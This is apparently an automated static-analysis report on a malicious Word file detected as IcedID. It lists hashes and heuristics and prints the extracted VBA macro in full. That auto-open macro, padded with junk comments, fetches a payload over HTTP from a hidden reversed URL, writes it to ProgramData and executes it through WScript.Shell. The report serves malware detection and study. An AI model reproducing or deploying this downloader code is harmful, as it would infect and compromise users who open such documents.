Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 7a9d68a282d629f7…

MALICIOUS

Office (OOXML)

140.3 KB Created: 2020-10-13 11:02:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-10-16
MD5: 25fd349645419754bf92ff1150329f1f SHA-1: 37eccaaf4a77d55abcd8dce78999a0fb1dc98fcb SHA-256: 7a9d68a282d629f70382c6c96de2d686941045008762d31941940ff68977f78f
230 Risk Score

Heuristics 6

  • ClamAV: Doc.Macro.ICEID1020-9781212-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set ZaZny = CreateObject("Script" + AgsMH)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 11783 bytes
SHA-256: 421c99eec8d5af69cc35afd4fae6d521855d557de5a8ef0ba034c491e3f047f4
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "sgCej"
Sub zMYMk(fZvzC, Optional ByVal acHHl As String = "c:\programdata\GKLHy.txt", Optional ByVal AgsMH As String = "ing.FileSystemObject")
' Lures nasally helplessness
' Senoritas pencilled eavesdrop
' Drapes invitingly sinusoidal jerboas
' Impression allowing
' Nattering misrepresents commences
' Collapse cents
' Gossips prosecutable hakea
' Velour dutifulness consolations percussed
' Alarmism planting talker
' Subject satsumas goofing anticipation bonanza
' Thought clusters sturdiest peerless
' Jointed overpower joule bladders
' Unentered
' Hawaiian
' Bantered
' Shelf bitts leave matriarchies deepening
' Referent hardpressed
Set ZaZny = CreateObject("Script" + AgsMH)
' Soup cabby synthetics circadian
' Clearness crimped magmatic leniently
' Devalued economics sectioning apostasy
' Comestible unnervingly climbed
' Crosschecked frostier doted loaner sunrise
Set EdibZ = ZaZny.CreateTextFile(acHHl)
' Candelas
' Ladyship exotica overstates essen
' Overcoat decimation nasty
' Perplexedly rottenness historicist defining
' Divorce facilities fringy
EdibZ.WriteLine fZvzC
' Shuffling egret numskull seamstress crusher
' Interbreed
' Brisker feared
' Leadfree flack kinsmen
' Owners cavity lifeless
EdibZ.Close
' Chlorine copperplate perimeter snarl averred added flaunted
' Insomniacs possibly
' Setter pager quelled mechanistic belfry
' Escalate
' Garrison miner
' Brainlessness mended arcading
' Specialities
' Customise
' Lips discourteous seraphic unassailed
' Fragrances
' Negotiation neatens
' Aftercare permeated cloak powdery spike punitive
' Haemophiliacs allotted confederate colonial
' Defeater experience fatwa
' Extenuate stumpy absences indicating
' Amethystine pestilential condenser
' Extended
' Toothier tribunal furnished
' Oaks propane denoted retainer needs
' Interlocutors survivals granaries wary
' Goofs lenient
' Bags hover fleecy
' Surrealists garbling ebony strifes
' Shunning aliphatic
' Breezes disruptively part sac roulette
' Bonny flexion silhouetted accountancy airraid
' Appraises diminishes chairwomen votes
' Militates chambered manipulators hearsay womanise episcopacy
' Ballooning apportions undemocratic
' Temptations mobilises quailed
' Aqueous withers corroborate snoozing lactic
' Scalds
' Beholding loquacious
' Sweltering splattering percolate
' Totalitarian dote
' Withstood intersections trounces predisposed palatability
' Volunteer possession disassemble
' Custodial longitude
End Sub
' Sinusitis glittering discontented
' Trappings buccaneering disapprove
' Spars
' Steadygoing busybodies explore bard gunship consecrated
' Shudders contractually germinal
Sub AutoOpen()
' Six voice scoot spiced crofts
' Pork pyroxene
' Backwards pimply reciprocity
' Demilitarisation
' Jettisoning perseveringly
' Etui budded at
' Sixfold dissuaded likens
' Powerless provocations jilting
' Experimentalists
' Righthanded crispiest commissioners piteous renege
' Fusses curators channels
' Input impeachments retorting
' Pathos doorbells systolic
' Footprints blocky adaptability squirted
' Triviality grimacing teardrop
' Configured sportive genteel annoyers tremendously
' Assassination abstain pipeline
' Collisional outface
' Leakage photocopying
' Interoperability sunflower
' Ensemble sided
' Lab scoring shortages curses
' Hungriest superlatives
' Nestegg streetwise gumshoe
' Oedema suits
' Kingsized pertinent unprivileged
' Acidrain halting checklists magnolia silt
Dim GdSiS As New FMZUk
' Chancing repeats dysfunctional
' Paradoxical counterbalance humouring baggier salvages
' Exacerbating beaked busker
' Environmentalist
' Bacterium spiked regally ablates
' Crypts
' Abdominal tankard supercomputer dryness overpayment
fZvzC = GdSiS.VhfkK("MSXML2.serverXMLHTTP")
' Nonexistent
' Pathologies pooch
' Undernourishment gobbling drool
' Friskiest stockade
' Cervix isolated enumerable
' Strolls velodrome secretary
' Groundswell cornea emulator
zMYMk YXqlK(fZvzC)
' Lecher pupated
' Mannerism flavours laden
' Astronomer bearable verdure
' Typically comas groper
' Shortsightedness rifting
' Exhaustively grudgingly
' Bloodsports throwing afforestation wrestling
' Stole castaway lamina
' Disease chicanery tincture
' Graphical striver daunts
' Volts herb secessions whine
' Tubular decorator dismaying cortege
vxDJF kBNex(0) + "vr32 c:\programdata\GKLHy.txt", "ws"
End Sub
Function wijDG(tAPgr, ohCyp)
' Explains snits
' Three coda
' Slip
' Amours monthlies uncalibrated
wijDG = Split(tAPgr, ohCyp)
End Function

Attribute VB_Name = "wMBfi"
' Quartic clubroom smokeless clouding pureness renowned
' Insularity indexer richer
' Bevels steadfast
' Blasted exudate undergrounds postmen livelier overcapacity
' Sociable
' Comber resourceful
Function YXqlK(RpYMV)
' Soots
' Stablemate brotherhood
' Sleeplessness disinterested
' Walruses fulfil joked
YXqlK = StrConv(RpYMV, vbUnicode)
' Franc
' Churlishness absentmindedly mileposts nimbleness farmsteads unlicensed interrogatives
' Granular dawned complainingly
' Underskirt feminism
' Burgeoning san
End Function
' Exterminate loony infringes teenager
' Hoarser twinge really reformations
' Rainwater vestige casualty masseuses handy blackmailing hones tights
' Tropopause godsend scratchy
' Maturity centrifuges crumples
' Stopwatch vegetate drizzle burners breadwinner
Function JmLHe()
' Dublin sherries typifies uncreased
' Magneto antifreeze chandler hooray interesting
' Revitalise freezer homecoming authenticates
' Televised
' Episode axiomatic ballad
' Hymnal tuesday unorthodox cajole warmness
' Amalgams overspill oversensitivity ergodic argued
' Incurred extractions preserving appendix catchphrases
' Immunities seem
' Palaeontologist entail corroborates
With ActiveDocument.shapes(1)
JmLHe = .AlternativeText
End With
End Function
' Loves elongate expectancies
' Archaeology collectables speckled
' Canadian pesticide emotionally unclouded talented mysteriously hermetic
' Modality dismantling
' Muffler parlour kebabs similitude sinews
' Dimmest loads
Function kBNex(ccvfP)
' Splittings decay gyrating morphisms
' Fixation ringlets
' Deliberative solidarity juvenile flood
' Prince corrodes sating gratify
' Politically correctors
' Standardisation subroutine secateurs pulverised
' Chow helterskelter
' Pitted occupants earaches colonnade
' Telephony headmistress bladed cabbages moles
' Vulcanised dassie hexameter dahlia
' Nationalisation racketeering pedagogically roadway gagged
' Nullity refutable aupairs
FXSKU = JmLHe()
GufpG = wijDG(FXSKU, "###")
iUVCk = GufpG(ccvfP)
kBNex = iUVCk
End Function

Attribute VB_Name = "FMZUk"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function Reverse(Text)
    Dim i As Integer
    Dim StrNew As String
    Dim strOld As String
    strOld = Trim(Text)
    For i = 1 To Len(strOld)
      StrNew = Mid(strOld, i, 1) & StrNew
    Next i
    Reverse = StrNew
End Function
' Froze governesses
' Ford crochets
' Hear
' Soldered conkers coquettish impracticability
Function VhfkK(bzaia)
' Sensation penknife
' Unbeliever gluttony motherofpearl syrups
' Protest
' Madrigals khaki soot import
' Blamelessly paining
' Subsoil sturdily legumes fidgety ascertains foramen tradings
Dim Ywxvu As Object
' Waistband
' Van polymers
' Iconographic splashy modernists
' Peculiar
' Computes lamed registers
' Unmemorable dankest deviate phonon
' Copulations crossbow healthiest forged clones churchman
' Fingerless interrupting
' Unobtrusive amputees profiteering submarines putt
' Guide angola mastering dismal tactile
' Screenwriter
' Relentless weddings prolongation nomad instigating
Set Ywxvu = CreateObject(bzaia)
' Tinge nylons
' Parametrisation tippling bleakness tumbled
' Earthbound shindig
' Devilled delaying gamy roundel
' Loser clone tolerating
' Dispensation quasar businesswoman
' Luxuriously juniper
' Receptor inundate boneless startups prejudicial
' Mostly guffaws responsibly notes eel
' Blameworthy wallflower reissued judiciously
' Foreseeing farmhouse
' Bogged gravitas propagate crimes
' Forgiven
' Fatherly innovating yaws petitions
' Rage goodlooking pecking
' Headlines testers
' Subclasses charlie
' Saving eg anchorite compatibility martens
' Ministering stashes wriggling
' Forceful
' Ladle emblematic gynaecology
' Presenting lovingly neuronal decorum
' Drugs deranged
' Unbroken iterating drown scotfree
' Proportional hail vulgarly
' Ripened undying
' Enviable fugitives tens prunings sagely
LJSGF = kBNex(1)
' Invasions reconsult hegemonic replier formic priories dispatcher
' Molar inconsiderateness bonbon
' Romping halfway herds normed digressed swung gals
' Pasty situate
Ywxvu.Open "GET", Reverse(LJSGF), False
' Absolved overnight
' Thinkable
' Librettists writings wafture boracic
' Ghastliest
Ywxvu.Send
' Culturally drools kedgeree sequin gamete
' Curtilage stammering parenthetical ablation
' Fewest saps
' Trap curd
' Endued mushroomed densitometry
' Awaits memorials deteriorates resea epistles
VhfkK = Ywxvu.responsebody
End Function

Attribute VB_Name = "HGhgQ"
Sub vxDJF(RHhQj, vToxs)
' Otherness gooey cellulite
' Cannoned indirection
' Disintegration attesting ruptures
' Romanticises wenches
' Decoupled expertly alluvia hexagon scowls dew
' Gallivanted liberals
Set rCNyB = CreateObject(vToxs + "cript.shell")
' Mostly prawns masks contemporaneity peddlers integrative
' Dubbed increase fishmonger
' Skyward rash
' Melancholic scarred girder ancestor troopship
' Magniloquent
' Veritable deceitfulness
' Illegibly strenuously exemplify
' Obscurely missile promised encircling
' Suckle impatiently beans
' Haulers familiarise
' Configurable hibernal
' Alcove diphtheria hoarsely
' Glimpses
' Punitive immovable depositions
' Disarrayed polity electrocardiographic answering sixteen enrichments
' Rakish stink rep quiveringly slowness
' Helpful martyr interdict
' Hoover frustratedly mappable
' Iceage calcify smilingly
' Needling onuses gawpin elbow
' Ranters mapper
' Phrenological limit kinematics sickens reporters
' Proletarians apogee rafting
' Lifesaving exponentiation
' Lawless interrelated
' Obnoxiously enhances
' Neuroscientists prompt
' Enraged stitches hart
' Ascetic participle drapers hiring dictator
' Interoperable driest sedater disheartened
' Stacking pilgrims sandbanks
' Heathen powersharing maseru encroaches circumscribing
' Corroboration apache kinetic
' Courtesan perverts grazing weathers retaliate
' Fastness licensing
' Admittance wheedled femininity constitutions
' Internal clued disguised
' Mist attired
' Cyprian invulnerability arrowed
' Authorised
' Pharmaceuticals uprightly cahoots wanton launches
' Sternum cultivates crimes incidents abstentions dirtiest
' Uncovers hones inefficiency tolerate
' Intensification truncate perverts
' Boohoo webs enemy multilayer
rCNyB.exec RHhQj
' Boastfulness strongmen inelegant
' Residues aspect mitigate shorted animation perversely lookalikes
' Parakeets
' Poverty spacial edges
' Impressionistic shipwrecked waiver
End Sub
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 44544 bytes
SHA-256: 65d998971008c5350aae82543eb567f2df5bd280eb98ed36a9fd7898ff0717e9
Detection
ClamAV: Doc.Macro.ICEID1020-9781212-0
Obfuscation or payload: unlikely